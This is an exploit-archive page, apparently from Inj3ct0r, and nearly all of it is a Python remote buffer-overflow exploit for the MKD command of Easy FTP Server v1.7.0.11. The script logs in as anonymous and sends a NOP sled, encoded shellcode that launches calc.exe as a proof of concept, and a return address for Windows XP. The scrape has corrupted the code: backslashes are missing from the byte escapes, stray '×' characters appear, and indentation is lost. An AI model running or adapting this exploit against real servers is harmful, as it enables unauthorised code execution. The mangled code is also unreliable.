Easy FTP Server v1.7.0.11 MKD Command Remote Buffer Overflow Exploit
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Easy FTP Server v1.7.0.11 MKD Command Remote Buffer Overflow Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================================================
Easy FTP Server v1.7.0.11 MKD Command Remote Buffer Overflow Exploit (Post Auth)
================================================================================
#!/usr/bin/python
import socket,sys
# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]
print """
#
****************************************************************************
# #
* Easy FTP Server v1.7.0.11 [MKD] Remote BoF Exploit Post Authentication *
* Author / Discovered by : Karn Ganeshen *
* Date : July 5, 2010 *
* KarnGaneshen [aT] gmail [d0t] com *
* http://ipositivesecurity.blogspot.com *
# #
****************************************************************************
#
"""
if len(sys.argv) != 3:
print "Usage: ./easyftp_mkd.py <Target IP> <Port>"
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
# Buffer needed -> 272 bytes
# Metasploit Shellcode PoC – Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars x00x0ax2fx5c ]
shellcode = ("xdaxc0xd9×74x24xf4xbbxe6×9axc9×6dx5ax33xc9xb1"
"x33×31x5ax18×83xeaxfcx03×5axf2×78x3cx91×12xf5"
"xbfx6axe2×66x49×8fxd3xb4×2dxdbx41×09x25×89x69"
"xe2×6bx3axfax86xa3×4dx4bx2cx92×60x4cx80×1ax2e"
"x8ex82xe6×2dxc2×64xd6xfdx17×64x1fxe3xd7×34xc8"
"x6fx45xa9×7dx2dx55xc8×51x39xe5xb2xd4xfex91×08"
"xd6×2ex09×06x90xd6×22x40×01xe6xe7×92x7dxa1×8c"
"x61xf5×30x44xb8xf6×02xa8×17xc9xaax25×69x0dx0c"
"xd5×1cx65×6ex68×27xbex0cxb6xa2×23xb6×3dx14×80"
"x46×92xc3×43x44×5fx87×0cx49×5ex44×27x75xebx6b"
"xe8xffxafx4fx2cx5bx74xf1×75x01xdbx0ex65xedx84"
"xaaxedx1cxd1xcdxafx4ax24×5fxcax32×26x5fxd5×14"
"x4ex6ex5exfbx09×6fxb5xbfxe5×25x94×96x6dxe0×4c"
"xabxf0×13xbbxe8×0cx90×4ex91xebx88×3ax94xb0×0e"
"xd6xe4xa9xfaxd8×5bxcax2exbbx3ax58xb2×12xd8xd8"
"x51×6bx28")
nopsled = "x90" * 40
ret = "x10×3Bx880" # MAGIC RET 00883B10 (SP2) / 00893B58 (SP3) [ EBP points to nopsled when overflowed ]
payload = nopsled + shellcode + ret
print "[+] Launching exploit against " + target + "…"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect((target, port))
print "[+] Connected!"
except:
print "[!] Connection failed!"
sys.exit(0)
s.recv(1024)
# Targetting default user ‘anonymous’ on the target
s.send(‘USER anonymousrn’)
s.recv(1024)
s.send(‘PASS anonymousrn’)
s.recv(1024)
print "[+] Sending payload…"
s.send(‘MKD ‘ + payload + ‘rn’)
print "[!] Verifying if the user has ‘Create Directory’ permission. This may take some time…"
try:
s.recv(1024)
print "[!] Uhh.. User does not have MKD privilege. +++Exploit failed+++"
except:
print "[+] +++Exploit Successful+++ ^_^"
s.close()
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-17]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13387
Leave a Reply